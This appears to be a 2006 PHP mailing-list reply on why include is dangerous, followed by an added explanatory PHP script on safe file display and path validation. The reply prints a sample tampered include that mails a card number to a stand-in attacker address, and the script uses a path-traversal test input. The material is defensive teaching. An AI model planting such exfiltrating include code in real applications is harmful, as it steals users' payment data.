On Mon, November 20, 2006 9:44 am, tedd wrote:
> At 11:24 AM +0000 11/20/06, Stut wrote:
>> Ford, Mike wrote:
>>> My preference would be the include, but all of the options you've
>>> been given would do the job one way or another.
>>
>> Using include for this is potentially dangerous since it will
>> execute any PHP code contained within the file. Only use include if
>> you are absolutely sure you trust the content of the files you are
>> displaying.
>
> To all:
>
> I understand that an include file will be executed "as-is", but how
> can someone change one of my includes? On my virtual host, I have to
> jump through ftp hoops (i.e., change permissions) to write a file and
> that's me knowing the logon and password. How does someone hack
> through that?

There are too many variables here to be sure who was saying what, but
consider that it's not just a question of them executing code they
want, but executing it in the context of YOUR web application.

For example:

<?php
// hacked include file: this runs inside your script, so it can read
// whatever variables your application already has in scope and mail
// them out (here the card number and expiry go in the subject line).
mail('badguy@xxxxxxxxxxx', "$cc_number|$expiration", "");
// rest of "normal" include file below
?>

> And if they could hack through that, then nothing is secure including
> includes, right? If the evil doer has gone that far, then why not
> just run the evil code and be done with it, why screw around with
> includes, which may, or may not, be executed?
>
> What am I not getting here?
>
> Also, aren't there any safe methods for using includes?

You're not thinking correctly yet. :-)

It's not like "safe" (i.e., "security") is an on/off switch. It's a
gradient.

Your host making you jump through chmod hoops in FTP probably makes
most things more secure for you and yours.

But if a Bad Guy gets 'root' access on the server, your chmod doesn't
mean diddly-squat.

> For example, one could define a variable in an include and then check
> if it's defined in the calling code -- if it's defined then run, if
> not then exit. That is not fool-proof -- but it should stop someone
> from completely replacing your include code with theirs.

It's not really much of a barrier, but if there is a specific concern
with include files being alterable by untrusted users, I suppose it
might catch a particularly stupid untrusted user...

I'd think they'd find/notice the size restriction rather quickly,
however, and subvert it too quickly for it to be generally useful and
worth doing.

-- 
Some people have a "gift" link here.
Know what I want?
I want you to buy a CD from some starving artist.
http://cdbaby.com/browse/from/lynch
Yeah, I get a buck. So?

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
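The two points made in the reply above (an include runs with full access to your application's scope, and a "marker variable" check is not a real barrier), plus the alternative Stut hints at (display a file as data instead of including it), as an added PHP example that is not part of the original thread. The function names show_file_as_text() and run_checked_include(), the variable $include_ok and the pages directory are hypothetical; the sample files are constructed in a scratch directory so the script runs offline.

```php
<?php
// Added example for this thread, not code from the original post. The names
// show_file_as_text(), run_checked_include(), $include_ok and $pages_dir are
// hypothetical; the sample files are constructed below so the script runs offline.
declare(strict_types=1);

// 1. Displaying a file WITHOUT executing it: read it as data, escape it for HTML.
//    $name is untrusted (think $_GET['page']); $pages_dir is fixed by the application.
function show_file_as_text(string $pages_dir, string $name): ?string
{
    // Only plain file names: no "/", no "..", no NUL bytes, fixed extension.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.txt$/', $name)) {
        return null;
    }
    $base = realpath($pages_dir);
    $path = realpath($pages_dir . DIRECTORY_SEPARATOR . $name);
    // realpath() resolves symlinks and "..": confirm we are still under $pages_dir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    $data = file_get_contents($path);
    if ($data === false) {
        return null;
    }
    // Any "<?php ... ?>" in the file is rendered as text, never run.
    return htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
}

// 2. The "marker variable" idea from the thread: the caller expects the include
//    to set $include_ok and refuses to continue otherwise.
function run_checked_include(string $file): bool
{
    $include_ok = false;
    include $file;      // executes in THIS scope, so it can read and set $include_ok
    return $include_ok === true;
}

// --- constructed sample files in a scratch directory ---
$pages_dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . uniqid();
mkdir($pages_dir, 0700);

// A page whose text happens to contain a PHP tag.
file_put_contents($pages_dir . '/about.txt', "About us <?php echo 'RAN'; ?>\n");

// A tampered include: it sets the marker itself, then does the attacker's work.
file_put_contents($pages_dir . '/header.php',
    "<?php \$include_ok = true; \$GLOBALS['leaked'] = 'cc_number here'; ?>\n");

// include executes the PHP tag inside about.txt; the text path shows it escaped.
ob_start();
include $pages_dir . '/about.txt';
$via_include = ob_get_clean();
$via_text    = show_file_as_text($pages_dir, 'about.txt');
echo "include: ", $via_include, "\n";
echo "as text: ", $via_text;

// Traversal is rejected by the name check before any file is opened.
var_dump(show_file_as_text($pages_dir, '../../etc/passwd'));

// The marker check passes for the tampered include, because the attacker simply
// set the marker too, and the include ran with access to the application's globals.
var_dump(run_checked_include($pages_dir . '/header.php'));
var_dump($GLOBALS['leaked'] ?? null);

unlink($pages_dir . '/about.txt');
unlink($pages_dir . '/header.php');
rmdir($pages_dir);
```

Run it with the PHP CLI. The text path never hands the file to the PHP parser, so nothing in it can execute no matter who last wrote it; the marker check, by contrast, is defeated by the same write access that replaced the include in the first place, which is why the reply above calls it "not really much of a barrier".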